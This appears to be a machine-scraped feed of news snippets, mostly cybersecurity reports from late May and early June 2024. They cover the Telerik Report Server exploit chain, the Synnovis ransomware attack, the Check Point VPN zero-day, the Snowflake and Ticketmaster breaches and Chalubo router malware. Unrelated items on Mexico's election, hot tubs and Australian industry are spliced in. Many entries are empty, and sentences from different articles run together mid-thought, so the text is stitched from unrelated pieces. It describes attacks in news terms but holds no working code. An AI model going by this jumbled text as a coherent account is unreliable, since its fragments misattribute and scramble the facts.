⚠️Here is the Exploit Chain targeting Telerik Report Server CVE-2024-4358/CVE-2024-1800 that allows pre-authenticated Remote Code Execution 🩸 by chaining a deserialization 🪲 and an interesting authentication bypass 🔥🔥🔥https://t.co/ZkPL8vggcH pic.twitter.com/Og7n4qRoXN — SinSinology (@SinSinology) June 3, 2024 An unauthenticated attacker can exploit the flaw to gain access Telerik Report Server restricted functionality via an authentication bypass vulnerability. "Autosummary:
Cybercriminals are promoting a new phishing kit named "V3B" on Telegram, which currently targets customers of 54 major financial institutes in Ireland, the Netherlands, Finland, Austria, Germany, France, Belgium, Greece, Luxembourg, and Italy. "Autosummary:
While Synnovis has yet to issue a public statement regarding the June 3 ransomware attack, memos sent by partner hospitals affected by the attack revealed that this "ongoing critical incident" has had a "major impact" on healthcare services across southeast London. "Autosummary:
Details about Decoy Dog, a custom variant of the open-source Pupy RAT, emerged in April 2023, when Infoblox uncovered the malware"s use of DNS tunneling for communications with its command-and-control (C2) server to remotely control infected hosts. "Autosummary:
“Based on our investigation, we have determined that the third party was likely a cybercrime group, which gained access to, among other information, personally identifiable information.” reads the Form 10-Q (quarterly report of financial performance) filed by the company with the SEC in May. "Autosummary:
"Autosummary:
After being compromised, user accounts belonging to Sony, CNN, and Paris Hilton had to be taken down to prevent abuse. "Autosummary:
Consumer protection The Federal Trade Commission (FTC) has an article about utility scams, however the technique mentioned there is about scammers calling victims, rather than the other way around. "Autosummary:
A ransomware attack on Synnovis impacted several London hospitals Pierluigi Paganini June 04, 2024 June 04, 2024 A ransomware attack that hit the provider of pathology and diagnostic services Synnovis severely impacted the operations of several London hospitals.Trauma cases at Kings being sent to other sites: pic.twitter.com/zmtsq6c0zL — Shaun Lintern (@ShaunLintern) June 4, 2024 Below is the message sent by Professor Ian Abbs, Chief Executive Officer Guy’s and St Thomas’ NHS Foundation Trust:Dear Colleague "I am writing to update you about the ongoing critical incident that is currently affecting our pathology services. "Autosummary:
Alpha HPA Alpha HPA already produces a range of ultra-high purity aluminium materials “This government has continued to approve new gas and coal projects - it"s flown to Japan, India, Korea, and Vietnam to secure long-term markets for gas and coal.Doing so, the government argues, is a national security priority, as countries examine their trade dependence on Beijing, and look to insulate themselves against supply chain shocks.“It’s a big opportunity for us to be an exporter of climate solutions to the world instead of climate problems,” John Grimes, who heads the Smart Energy Council, says. "Autosummary:
"NethSecurity is a free, open-source Linux firewall that simplifies network security deployment. It integrates various security features into one platform, including firewalling, intrusion detection and prevention, antivirus, multi-WAN, DNS, and content filtering. NethSecurity has an intuitive interface that delivers real-time insights and control over network security. It is a centralized hub for monitoring and managing firewall activities, presenting essential information such as intrusion attempts, traffic patterns, and system health. Fully featured Linux firewall Some of … More
The post NethSecurity: Open-source Linux firewall appeared first on Help Net Security.
"Autosummary:
Future plans and download Version 8.0 was released recently, but the developers plan to release another major update in the coming months, which is set to include: Firewall Objects Reporting Conntrack UI Admin User Management from the UI NethSecurity is available for free on here. "Autosummary:
"Upon execution, the PowerShell code performs multiple functions, including clearing the DNS cache, displaying a message box, downloading further PowerShell code, and installing "LummaC2" malware," the company said. "Autosummary:
EPA Ms Sheinbaum, a former energy scientist, has promised continuity, saying that she will continue to build on the "advances" made by Mr López Obrador. "Autosummary:
"Autosummary:
The APT28 group (aka Fancy Bear, Pawn Storm, Sofacy Group, Sednit, BlueDelta, and STRONTIUM) has been active since at least 2007 and it has targeted governments, militaries, and security organizations worldwide. "Autosummary:
The victims belong to the following industries/sectors: manufacturing (including automotive, aerospace, pharmaceutical, food and beverages, clothing, cosmetics and many other sub-sectors), utility , energy , transportation and logistics , engineering ,and mining . Electronics Foxsemicon hit by ransomware Manufacturing, electronics | Denial of IT services, data leakage, personal data leakage | Ransomware On January 15, semiconductor equipment manufacturer Foxsemicon Integrated Technology, a subsidiary of Taiwanese electronics giant Foxconn, was the victim of a cyberattack. Pharmaceutical HAL Allergy hit by ransomware Manufacturing, pharmaceutical | Data leakage, denial of services, product delivery delay | Ransomware On February 19, Dutch pharmaceutical company HAL Allergy Group was hit by a ransomware attack, according to a statement on its website. Veolia hit by ransomware Water supply, utility | Denial of IT systems, denial of services, personal data leakage | Ransomware The North American municipal water division of Veolia, a French transnational utility company, experienced a ransomware incident that impacted certain software applications and systems. Varta hit by cyberattack Manufacturing, automotive | Denial of IT systems, denial of operations Varta, a German manufacturer of batteries for the automotive, industrial and consumer sectors, disclosed that its systems were affected by a cyberattack on February 12. Hewlett Packard hit by cyberattack Manufacturing, electronics | Data leakage | APT On January 19, Hewlett Packard Enterprise filed a Form 8-K with the US Securities and Exchange Commission (SEC), reporting unauthorized access to the company’s cloud-based email environment by a threat actor believed to be Midnight Blizzard (aka Dukes, CozyBear and NOBELIUM/APT29/BlueBravo).The group said it had stolen 110GB of data from Lush, allegedly including many personal documents such as passport scans, and company documents related to accounting, finance, tax, projects, and customers. EAS hit by ransomware Manufacturing, engineering | Data leakage, denial of operations | Ransomware Dutch mechanical engineering and manufacturing company EAS Europe was the victim of a ransomware attack on February 26, according to a notice on its website. Logistics and transportation GCA hit by cyberattack Transportation, logistics | Denial of IT services French transport and logistics company GCA (Groupe Charles André) suffered a cyberattack during the night of February 17-18, resulting in an interruption of its internet access and the disruption of its usual communications, according to a message sent to its customers. Muscatine Power and Water hit by ransomware Water supply, energy, utility | Denial of IT services, personal data leakage | Ransomware US utility company Muscatine Power and Water (MPW) discovered a cybersecurity incident impacting its corporate network environment. Automotive ThyssenKrupp hit by cyberattack Manufacturing, automotive | Denial of IT systems, denial of operations German steelmaker and automotive supplier ThyssenKrupp said in a statement that it suffered a cyberattack that affected its auto body manufacturing division, ThyssenKrupp Automotive Body Solutions.The forensic investigation revealed that some current and former customer data, such as address, social security number, driver’s license, etc., may have been compromised in the incident. Etesia hit by cyberattack Manufacturing | Denial of IT systems, services and operations French mower manufacturer Etesia was the victim of a cyberattack on February 2, according to local press reports, forcing 160 employees to work part-time. Radiant Logistics hit by cyberattack Transportation, logistics | Denial of services Radiant Logistics, an international freight company, isolated its Canadian operations following a cybersecurity incident. "Autosummary:
"It means more rights, a welfare state, education, health, access to housing, and that a living wage is a right, not a privilege," she added.Now, in a few months, she will occupy the National Palace, succeeding her mentor, outgoing President Andrés Manuel López Obrador, known by his initials, Amlo. "Autosummary:
Any unsuspecting victim that has come this far and is willing to steal from the treasure dropped in their lap, now realizes that before they can enjoy all that money, they first: Need to open a new account. Malwarebytes blocked the domain for fraud To fully understand the message, it’s good to know that USTD stands for Tether, a cryptocurrency referred to as a stablecoin because its value is pegged to a flat currency.A TRC20 wallet app is an application, accessible on mobile/web or desktop devices, designed specifically for storing, managing, and engaging with TRC20 tokens. Transfer form Sadly, there were obstacles: Transfers can only be done to other accounts on the platform and the recipient needs to be at least a VIP1 level. "Autosummary:
The Telerik Report Server is an API-powered end-to-end encrypted report management solution organizations use to streamline the creation, sharing, storage, distribution, and scheduling of reports. "Autosummary:
"Autosummary:
"Autosummary:
This led the company to institute a new hot tub policy, where guests have to pay more to use a hot tub in the summer, or if their hot tub requires a mid-week water change.“In the winter, most guests still want to opt in to the hot tub but increasingly in the summer, more and more guests are opting out,” says Al Judge, the cofounder of AliKats. "Autosummary:
"Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: RansomLord: Open-source anti-ransomware exploit tool RansomLord is an open-source tool that automates the creation of PE files, which are used to exploit ransomware pre-encryption. Attackers are probing Check Point Remote Access VPN devices Attackers are trying to gain access to Check Point VPN devices via local accounts protected only by passwords, the company has warned on Monday. How to combat … More
The post Week in review: Attackers trying to access Check Point VPNs, NIST CSF 2.0 security metrics evolution appeared first on Help Net Security.
"Autosummary:
Chronon: Open-source data platform for AI/ML applications Chronon is an open-source, end-to-end feature platform designed for machine learning (ML) teams to build, deploy, manage, and monitor data pipelines for machine learning. "Autosummary:
On the spoofed site, a large green button prompted users to download a document named “Рахунок.docx” (“Invoice.docx”), which instead downloaded a malicious archive titled “Заборгованість по ЖКП.rar” (“Debt for housing and utility services.rar”).FlyingYeti targets Ukraine using WinRAR exploit to deliver COOKBOX Malware Pierluigi Paganini June 02, 2024 June 02, 2024 Russia-linked threat actor FlyingYeti is targeting Ukraine with a phishing campaign to deliver the PowerShell malware COOKBOX. "Autosummary:
UK ambassador left post after "pointing gun at staff" In the video, a man resembling Jon Benjamin can be seen aiming a gun at people in a car Mr Benjamin hasn"t commented so far on what appears to have been a badly misplaced joke. "Autosummary:
Critical Apache Log4j2 flaw still threatens global finance Pierluigi Paganini June 01, 2024 June 01, 2024 The vulnerability CVE-2021-44832 is Apache Log4j2 library is still a serious problem for multiple industries, expert warns it threatens global Finance. “The breaches have resulted in the exfiltration of several terabytes of customer data, including access tokens, email account passwords, and SSL certificates. "Autosummary:
Kaspersky has tested the tool on popular Linux distributions and confirmed it works on Red Hat Enterprise Linux, CentOS, Linux Mint, Ubuntu, SUSE, openSUSE, and Debian, among others. "Autosummary:
The data was advertised for $500,000 and says it includes customer names, addresses, emails, credit card details, order information, and more. Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts.Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts. "Autosummary:
“On May 20, 2024, Live Nation Entertainment, Inc. (the “Company” or “we”) identified unauthorized activity within a third-party cloud database environment containing Company data (primarily from its Ticketmaster L.L.C. subsidiary) and launched an investigation with industry-leading forensic investigators to understand what happened.” "Autosummary:
Meet the women campaigning to become Mexico"s first female president 2 hours ago Will Grant , Mexico and Central America correspondent Share Reuters Opinion polls have given Xóchitl Gálvez and Claudia Sheinbaum a wide lead over their rivals As Claudia Sheinbaum, the front-runner in Mexico’s presidential election, arrives for a rally in a packed park in the colonial city of Orizaba, the crowd starts to chant "Presidenta!"With her closest rival, Xóchitl Gálvez, also a woman, and the only man in the presidential race a distant third, Mexico is almost certain to set to break centuries of male domination of the country’s highest office. "apexanalytix launched Cyber Risk, a solution that automatically assesses the cybersecurity posture of every supplier, continuously monitors the dark web to uncover risk exposure and responds to threats impacting suppliers in real-time. Business partner data breaches account for 15% of all cyberattacks, costing organizations an average of $4.76 million each year. With cyberattacks poised to be the top threat to supply chains over the next five years, businesses must have full visibility into their suppliers … More
The post apexanalytix Cyber Risk provides instant alerts for supplier data breaches appeared first on Help Net Security.
"Autosummary:
By offloading the significant burden of cyber risk management, companies can worry less about the administrative tasks and focus more on executing the risk-aware strategies that enhance operational resilience,” said Charlie Clark, GM & EVP, apexanalytix Cyber Risk division. "Autosummary:
Members are advised to be cautious of any unsolicited communications requesting personal information or unexpected actions, including letters, calls, texts, emails, and web page referrals. "Personal information of current and former BBC employees has been exposed in a data breach that affected the broadcaster’s in-house pension scheme. More than 25,000 individuals have been affected, according to The Guardian. What data was exposed? “On the 21 May, the BBC’s information security team alerted us to a data security incident, in which some files containing personal information of BBC Pension Scheme members records were copied from a cloud-based data storage service used … More
The post 25,000 individuals affected in BBC Pension Scheme data breach appeared first on Help Net Security.
"Autosummary:
“On the 21 May, the BBC’s information security team alerted us to a data security incident, in which some files containing personal information of BBC Pension Scheme members records were copied from a cloud-based data storage service used by our administration team,” the BBC Pension and Benefits Centre said. "Attackers have been exploiting CVE-2024-24919, a zero-day vulnerability in Check Point Security Gateways, to pinpoint and extract password hashes for local accounts, which they then used to move laterally in the target organizations’ network. “The vulnerability is particularly critical because it does not require any user interaction or privileges, making it easy to exploit remotely,” IT security service provider Mnemonic noted, and shared that they have observed several attacks that included CVE-2024-24919 exploitation. About CVE-2024-24919 … More
The post Check Point VPN zero-day exploited since beginning of April (CVE-2024-24919) appeared first on Help Net Security.
"Autosummary:
About CVE-2024-24919 The existence and in-the-wild exploitation of the flaw was revealed by Check Point on Tuesday, a day after they warned that about discovered instances of attackers making login attempts “using old VPN local-accounts relying on unrecommended password-only authentication method.” "Autosummary:
APT28, also known by the names BlueDelta, Fancy Bear, Forest Blizzard, FROZENLAKE, Iron Twilight, ITG05, Pawn Storm, Sednit, Sofacy, and TA422, is an advanced persistent threat (APT) group affiliated with Russia"s strategic military intelligence unit, the GRU. "Autosummary:
Over 600,000 SOHO routers were destroyed by Chalubo malware in 72 hours Pierluigi Paganini May 31, 2024 May 31, 2024 The Chalubo trojan destroyed over 600,000 SOHO routers from a single ISP, researchers from Lumen Technologies reported. Between October 25 and October 27, 2023, the Chalubo malware destroyed more than 600,000 small office/home office (SOHO) routers belonging to the same ISP. "Autosummary:
"Autosummary:
Snowflake"s cloud data platform is used by 9,437 customers, including some of the largest companies worldwide, like Adobe, AT&T, Capital One, Doordash, HP, Instacart, JetBlue, Kraft Heinz, Mastercard, Micron, NBC Universal, Nielsen, Novartis, Okta, PepsiCo, Siemens, US Foods, Western Union, Yamaha, and many others. "Autosummary:
Oleg Vyacheslavovich Kucherov: Also known as "gabr," the 51-year-old Russian is implicated as a key member of the "Trickbot" group also known as "Wizard Spider," engaging in infecting computer systems, stealing data, and using ransomware to extort victims. "Autosummary:
In the past, ShinyHunters has breached or leaked the data for numerous companies, including Wattpad, Tokopedia, Microsoft"s GitHub account, BigBasket, Nitro PDF, Pixlr, TeeSpring, Promo.com, Mathway, and many more. "Autosummary:
The allegedly stolen databases supposedly contain 1.3TB of data, including customers" full details (i.e., names, home and email addresses, and phone numbers), as well as ticket sales, order, and event information for 560 million customers. "Autosummary:
The fix has been backported to multiple stable kernel versions as listed below: v5.4.269 and later v5.10.210 and later v6.6.15 and later v4.19.307 and later v6.1.76 and later v5.15.149 and later v6.7.3 and later In late March 2024, a security researcher using the alias "Notselwyn" published a detailed write-up and proof-of-concept (PoC) exploit on GitHub, showcasing how to achieve local privilege escalation by exploiting the flaw on Linux kernel versions between 5.14 and 6.6. "Autosummary:
The leaked data included details of 138,751 customer accounts, including device information, email addresses, IP addresses, names, passwords, phone numbers, physical addresses, SMS messages, and usernames. "Have attackers compromised Snowflake or just their customers’ accounts and databases? Conflicting claims muddy the situation. What is Snowflake? Snowflake is cloud-based data storage and analytics company based in the US, and claims nearly 9,500 organizations around the world as customers. “From an enterprise perspective, Snowflake is typically set up as a cloud-based data warehousing solution. Enterprises choose a cloud provider (AWS, Azure, or Google Cloud), and set up their Snowflake account within the chosen … More
The post Snowflake compromised? Attackers exploit stolen credentials appeared first on Help Net Security.
"Autosummary:
Snowflake has compiled a document outlining known indicators of compromise, investigative queries Snowflake admins can use to detect access from suspected IP addresses and clients, remediation measures (disabling suspected users, resetting credentials) they should take if they find their databases have been accessed by the attackers, and attack prevention advice.Data is ingested from various sources, transformed, and analyzed using SQL,” Doron Karmi, Senior Cloud Security Researcher at Mitiga, told Help Net Security. "Autosummary:
On May 30, 2024, ShinyHunters published an announcement titled: “Santander Bank Data – Spain, Chile, Uruguay – Customers, CC, Bank, more” that claims country affected are Spain, Chile, and Uruguay. "Autosummary:
Opinion polls have given the frontrunner, Claudia Sheinbaum, and her main rival, Xóchitl Gálvez, such a large lead over their male rivals, that a female president looks like a foregone conclusion. "Autosummary:
The operation was supported by intelligence provided by experts from Bitdefender, Cryptolaemus, Sekoia, Shadowserver, Team Cymru, Prodaft, Proofpoint, NFIR, Computest, Northwave, Fox-IT, HaveIBeenPwned, Spamhaus, and DIVD. "Autosummary:
Reuters Xóchitl Gálvez is running on an anti-Morena ticket The current president, Andrés Manuel López Obrador, is limited by the constitution to a single six-year term but his Morena party has put forward the former mayor of Mexico City, Claudia Sheinbaum, as its candidate. "Autosummary:
"Autosummary:
The operation was supported by intelligence provided by experts from Bitdefender, Cryptolaemus, Sekoia, Shadowserver, Team Cymru, Prodaft, Proofpoint, NFIR, Computest, Northwave, Fox-IT, HaveIBeenPwned, Spamhaus, and DIVD. "Autosummary:
"Autosummary:
" The agency described the takedowns as the largest-ever operation against botnets, involving authorities from Armenia, Bulgaria, Denmark, France, Germany, Lithuania, the Netherlands, Portugal, Romania, Switzerland, Ukraine, the United Kingdom, and the United States. "Autosummary:
Cooler Master"s Fanzone site is used to register a product"s warranty, request an RMA, or open support tickets, requiring customers to fill in personal data, such as names, email addresses, addresses, phone numbers, birth dates, and physical addresses. "Autosummary:
Besides some common system information, this stealer goes after: Account tokens Steam tokens Saved card details System profiles Telegram logins List of running process names Installed browser lists and their version Credentials from the browser “User Data” folder, Local DB an autofill Cookies from the browser List of folders on the C drive This is just one scam, but there are always others using our name to target people. "Autosummary:
"Autosummary:
"The most prevalent malware families used in these spear-phishing campaigns were Agent Tesla, Remcos, SmokeLoader, Snake Keylogger, and GuLoader." "Autosummary:
"Autosummary:
Other propagation mechanisms for RedTail involve the exploitation of known security flaws in TP-Link routers (CVE-2023-1389), ThinkPHP (CVE-2018-20062), Ivanti Connect Secure (CVE-2023-46805 and CVE-2024-21887), and VMWare Workspace ONE Access and Identity Manager (CVE-2022-22954). "Autosummary:
According to ASEC, the following types of malware are installed by the malware on the breached system: Orcus RAT : Enables comprehensive remote control, including keylogging, webcam access, screen capture, and system manipulation for data exfiltration. "Autosummary:
The "Pumpkin Eclipse" infection chain Source: Black Lotus Labs Upon execution, which includes a 30-minute delay to evade sandboxes, the bot collects host-based information such as the MAC address, device ID, device type, device version, and local IP address. The first stage payload is a bash script named "get_scrpc," which executes to fetch a second script called "get_strtriiush," which is responsible for retrieving and executing the primary bot payload, "Chalubo" ("mips.elf"). "Autosummary:
"Cyber risk management has many components. Those who do it well will conduct comprehensive risk assessments, enact well-documented and well-communicated processes and controls, and fully implemented monitoring and review requirements. Processes and controls typically comprise policies, which will include detailed explanations of the acceptable use of company technology. There will usually be examples of the types of activity that are specifically not allowed – such as using someone else’s login credentials or sharing your own. … More
The post Avoiding the cybersecurity blame game appeared first on Help Net Security.
"Autosummary:
Leaving aside that this is a terrible way of expressing the situation – implying, as it does, fault and blame – this number does not correlate well at all with another statistic that suggests 85% of security budgets go to technology, 12% goes to policies, and a miserly 3% goes on people.To make this “stick”, there will almost certainly be training – some on “the basics” and on specific systems, but also other related matters – perhaps the requirements of data protection legislation, for example.If we blame the designers of controls, processes and procedures… well, we are just shifting blame, which is still counterproductive.There will be a policy against using it, for sure – and, yes, there may also be some technical controls. "RansomLord is an open-source tool that automates the creation of PE files, which are used to exploit ransomware pre-encryption. “I created RansomLord to demonstrate ransomware is not invincible, has vulnerabilities and its developers make mistakes and can write bad code just like everyone else,” hyp3rlinx, developer of RansomLord, told Help Net Security. He also outlined the tool’s key features: Leverages DLL hijacking tactics often used by cybercriminals. Deploys exploits in order to defend the network. … More
The post RansomLord: Open-source anti-ransomware exploit tool appeared first on Help Net Security.
"Autosummary:
cryptsp.dll alone defeats fifteen different ransomware: Yanluowang, Conti, LokiLocker, BlueSky, Haron, Thanos, AvosLocker, Meow, BabukLocker, Cerber, Clop, Play, LockerGoga, Jaff, RuRansom. "Cloud Security Engineer – Secret Clearance Required Constellation West | USA | Remote – View job details As a Cloud Security Engineer, you will establish, execute, and sustain an ISSP A&A capability that ensures the security of all information technology assets, while also ensuring compliance with FISMA. Recognize, assess, and mitigate threats to FSIS’s cloud-based systems, ensuring that security measures are proportional to the threats identified. CSIRT Team Lead CAE | Canada | On-site – … More
The post Cybersecurity jobs available right now: May 29, 2024 appeared first on Help Net Security.
"Autosummary:
Penetration Tester (UK Shift) WTW | Philippines | Hybrid – View job details As a Penetration Tester, you will conduct comprehensive assessments of web applications and infrastructure to identify security vulnerabilities, such as cross-site scripting (XSS), SQL injection, authentication flaws, insecure configurations, poor host device and service configurations, and use these to penetrate deeper into the application/server. Sr. Security Software Engineer, Ai and Data Platforms Apple | USA | On-site – View job details As a Sr. Security Software Engineer, Ai and Data Platforms, you will be responsible for developing security capabilities, services, and tools leveraging both GenAI and traditional security techniques to proactively identify and remediate application security risks earlier in the software development lifecycle. Cyber Analyst, Digital Forensics Incident Response At-Bay | Canada | On-site – View job details As a Cybersecurity Analyst focused on Digital Forensics and Incident Response (DFIR), you will participate in incident recovery activities (e.g., restoration of data from backups, reimaging workstations and servers, rebuilding network infrastructure, etc.) "Autosummary:
Samsung Electronics union calls first-ever strike A union representing thousands of workers at Samsung Electronics has called the first strike at the South Korean technology giant since it was founded five and a half decades ago. "Horizon3.ai researches have released proof-of-concept (PoC) exploits for CVE-2024-23108 and CVE-2023-34992, vulnerabilities that allow remote, unauthenticated command execution as root on certain Fortinet FortiSIEM appliances. CVE confusion FortiSIEM helps customers build an inventory of their organization’s assets, it aggregates logs and correlates information for threat detection and hunting, and allows automated response and remediation. CVE-2024-23108 and CVE-2024-23109 are OS command injection vulnerabilities in the FortiSIEM supervisor and can be exploited remotely, without authentication, with specially … More
The post PoC exploits for critical FortiSIEM command execution flaws released (CVE-2024-23108, CVE-2023-34992) appeared first on Help Net Security.
"Autosummary:
"Autosummary:
ABN Amro discloses data breach following an attack on a third-party provider Pierluigi Paganini May 29, 2024 May 29, 2024 Dutch bank ABN Amro discloses data breach following a ransomware attack hit the third-party services provider AddComm. "Autosummary:
Quantum Security Gateway and CloudGuard Network Security : R81.20, R81.10, R81, R80.40 and : R81.20, R81.10, R81, R80.40 Quantum Maestro and Quantum Scalable Chassis : R81.20, R81.10, R80.40, R80.30SP, R80.20SP and : R81.20, R81.10, R80.40, R80.30SP, R80.20SP Quantum Spark Gateways: R81.10.x, R80.20.x, R77.20.x To apply the update, head to the Security Gateway portal > Software Updates > Available Updates > Hotfix Updates, and click "Install." "Autosummary:
"Autosummary:
"Autosummary:
" 911 S5 proxy service prices (BleepingComputer) According to an indictment unsealed on May 24, dozens of Wang"s assets and properties are now subject to forfeiture, "including a 2022 Ferrari F8 Spider S-A, a BMW i8, a BMW X7 M50d, a Rolls Royce, more than a dozen domestic and international bank accounts, over two dozen cryptocurrency wallets, several luxury wristwatches, 21 residential or investment properties (across Thailand, Singapore, the U.A.E., St. Kitts and Nevis, and the United States), and 20 domains. 911 S5 customers also used the illegitimate residential proxy service to submit tens of thousands of fraudulent applications for programs related to the Coronavirus Aid, Relief, and Economic Security (CARES) Act, 560,000 fraudulent unemployment insurance claims, and over 47,000 Economic Injury Disaster Loan (EIDL) applications, resulting in billions of dollars stolen from financial institutions, credit card issuers, and federal lending programs. "Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
A second Python loader script, a ZIP archive containing the PythonMemoryModule package, and another ZIP archive containing "executor.dll." The new Python loader script is then launched to load executor.dll, a Borland Delphi-based malware also called ExecutorLoader, in memory using PythonMemoryModule. Targets of the campaign include banks such as Banco do Brasil, Bradesco, Banco Safra, Caixa Econômica Federal, Itaú Unibanco, Sicoob, and Sicredi. "Autosummary:
Windows 11 KB5037853 preview update (BleepingComputer) More highlights in the KB5037853 preview update Besides the changes mentioned above, this Windows 11 optional release comes with additional fixes and improvements, some of the more significant ones listed below: This update addresses an issue that affects Bluetooth Low Energy (LE) Audio headsets. "Autosummary:
"This data breach included cooler master corporate, vendor, sales, warranty, inventory and hr data as well as over 500,000 of their fanzone members personal information, including name, address, date of birth, phone, email + plain unencrypted credit card information containing name, credit card number, expiry and 3 digits cc code," the threat actor told BleepingComputer. "Autosummary:
" Threat actors have been observed extracting ntds.dit, a database that stores Active Directory data on users, groups, security descriptors, and password hashes, from compromised customers within 2-3 hours of logging in with a local user. "Autosummary:
Check Point released hotfix for actively exploited VPN zero-day Pierluigi Paganini May 29, 2024 May 29, 2024 Check Point released hotfixes for a VPN zero-day vulnerability, tracked as CVE-2024-24919, which is actively exploited in attacks in the wild. "Autosummary:
"We further noticed that a StackOverflow account "EstAYA G" created roughly 2 days ago is now exploiting the platform"s community members seeking debugging help [1, 2, 3] by directing them to install this malicious package as a "solution" to their issue even though the "solution" is unrelated to the questions posted by developers," explained Sharma in the Sonatype report. "CISOs have long been spreadsheet aficionados, soaking up metrics and using them as KPIs for security progress. These metrics have traditionally measured specific systems or single indicators — vulnerabilities detected, percentage of vulnerabilities patched, software and hardware asset inventory coverage, etc. The NIST Cybersecurity Framework (CSF) 2.0 underscored that metrics like these alone are insufficient and probably even improper when used as proxies for security outcomes. Siloed, narrow metrics do have a place in cybersecurity, … More
The post The evolution of security metrics for NIST CSF 2.0 appeared first on Help Net Security.
"Autosummary:
Why CISOs must equal weight metrics and process Yet, beneath this veneer of certainty lies a complex truth: individual metrics, while helpful, are fundamentally limited in that they only measure singular data points from siloed systems. Siloed metrics don’t tell the whole story: Narrow metrics may show the number of vulnerabilities patched but don’t capture root causes, how those vulnerabilities were prioritized, or if the most critical ones were addressed first. To understand why process metrics are a necessary complement to traditional siloed metrics, consider the recent attacks by Chinese and Russian hackers that allowed them to access email accounts of top US government officials and top Microsoft brass, respectively.These metrics have traditionally measured specific systems or single indicators — vulnerabilities detected, percentage of vulnerabilities patched, software and hardware asset inventory coverage, etc.More broadly, a narrow reliance on single data points, not metrics, as part of a more extensive process is dangerous for CISOs. "In this Help Net Security interview, Ken Gramley, CEO at Stamus Networks, discusses the primary causes of alert fatigue in cybersecurity and DevOps environments. Alert fatigue results from the overwhelming volume of event data generated by security tools, the prevalence of false positives, and the lack of clear event prioritization and actionable guidance. What are the primary causes of alert fatigue in cybersecurity and DevOps environments? Alert fatigue is the result of several related factors. … More
The post How to combat alert fatigue in cybersecurity appeared first on Help Net Security.
"Autosummary:
The three most important components of a modern security operations center (SOC) are the network detection and response (NDR) system, the endpoint detection and response (EDR) system, and the central analytics engine (usually a security information and event management (SIEM) system). I’ve already mentioned the importance of cybersecurity frameworks – these help organizations identify, protect, detect, respond to, and recover from cyberattacks. Lastly, the NDR and EDR must collect all relevant artifacts associated with a given security event, and if possible, correlate and organize them into an incident timeline to accelerate the investigation and allow defenders to eradicate the threat before it’s able to cause any damage. This additional information is proven to help SOC personnel more quickly assess the severity, sources, and causes of an incident, making these alerts much more actionable. "In this Help Net Security video, Tom Gorup, VP of Security Services at Edgio, discusses the continually changing threat landscape. It is riddled with vulnerabilities that are frequently exploited and only intensify as geopolitics and state-sponsored activity increase. Key highlights from the Edgio Q1 2024 Attack Trends Report include: API sprawl – Researchers identified 1.7 million APIs in March alone–creating an uncharted network of ‘shadow’ and ‘zombie’ APIs that operate behind the scenes of many … More
The post Cybersecurity teams gear up for tougher challenges in 2024 appeared first on Help Net Security.
"Autosummary:
"Incident response today is too time consuming and manual, leaving organizations vulnerable to damage due to their inability to efficiently investigate and respond to identified threats, according to Cado Security. The incident response challenge is further complicated as enterprises rapidly deploy cloud and container-based technologies and embrace a multi-cloud strategy. The report, which explores the critical role and challenges of incident response, reveals widespread shortcomings that leave organizations vulnerable to delays in resolving incidents and … More
The post 34% of organizations lack cloud cybersecurity skills appeared first on Help Net Security.
"Autosummary:
As organizations attempt to lean on existing tools, such as SOAR (Security Orchestration, Automation, and Response) platforms, to gain visibility into cloud-based threats, the report found that incident response automation is twice as effective when compared to SOAR for cloud investigations. "Autosummary:
"Autosummary:
"Autosummary:
Previously tracked as Storm-17, Moonstone Sleet has been observed attacking both financial and cyberespionage targets using trojanized software (e.g., PuTTY), malicious games and npm packages, custom malware loaders, and fake software development companies (e.g., StarGlow Ventures, C.C. Waterfall) set up to interact with potential victims on LinkedIn, Telegram, freelancing networks, or via email. "Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
Christie disclosed a data breach after a RansomHub attack Pierluigi Paganini May 28, 2024 May 28, 2024 Auction house Christie disclosed a data breach following a RansomHub cyber attack that occurred this month. "Autosummary:
The affected products are: FortiSIEM version 7.1.0 through 7.1.1 FortiSIEM version 7.0.0 through 7.0.2 FortiSIEM version 6.7.0 through 6.7.8 FortiSIEM version 6.6.0 through 6.6.3 FortiSIEM version 6.5.0 through 6.5.2 FortiSIEM version 6.4.0 through 6.4.2 The CERT-EU also published an advisory for the above vulnerabilities: “In February 2024, Fortinet quietly updated a 2023 advisory, joining two critical flows to the list of OS Command vulnerabilities affecting its FortiSIEM product. "Autosummary:
Since then, it has used AI in various forms to deliver: Differentiation between malicious and clean code samples Rapid triage, sorting and labelling of malware samples en masse A cloud reputation system, leveraging a model of continuous learning via training data Endpoint protection with high detection and low false-positive rates, thanks to a combination of neural networks, decision trees and other algorithms A powerful cloud sandbox tool powered by multilayered machine learning detection, unpacking and scanning, experimental detection, and deep behavior analysis New cloud- and endpoint protection powered by transformer AI models XDR that helps prioritize threats by correlating, triaging and grouping large volumes of events Why is AI used by security teams? On the other hand, as these capabilities become cheaper and more accessible, threat actors will also utilize the technology in social engineering, disinformation, scams and more. Here are a few examples of current and near-future uses of AI for good: Threat intelligence: LLM-powered GenAI assistants can make the complex simple, analyzing dense technical reports to summarize the key points and actionable takeaways in plain English for analysts. Today, security teams need effective AI-based tools more than ever, thanks to three main drivers: 1. "While fears of cyber attacks continue to rise, CISOs demonstrate increasing confidence in their ability to defend against these threats, reflecting a significant shift in the cybersecurity landscape, according to Proofpoint. CISOs’ confidence is growing despite fear of cyber attacks 70% of surveyed CISOs feel at risk of a material cyber attack over the next 12 months, compared to 68% the year before, and 48% in 2022. CISOs today clearly remain on high alert, but … More
The post Human error still perceived as the Achilles’ heel of cybersecurity appeared first on Help Net Security.
"Autosummary:
In 2024, 53% of CISOs admitted to burnout compared to 60% last year, while 66% feel they face excessive expectations, a steady increase from 61% last year and 49% in 2022. CISOs’ confidence is growing despite fear of cyber attacks 70% of surveyed CISOs feel at risk of a material cyber attack over the next 12 months, compared to 68% the year before, and 48% in 2022. "Ransomware remains one of the most pressing cybersecurity threats in 2024, with attackers continually evolving their methods to maximize impact and evade detection. In this Help Net Security round-up, we present excerpts from previously recorded videos featuring cybersecurity experts discussing ransomware-related topics such as payment practices, the recent surge in ransomware attacks, and more. Complete videos Steve Gwizdala, VP of Healthcare at ForgeRock, discusses how vigilance and new ways of enhancing cybersecurity measures will be … More
The post Ransomware operators shift tactics as law enforcement disruptions increase appeared first on Help Net Security.
"Autosummary:
"Autosummary:
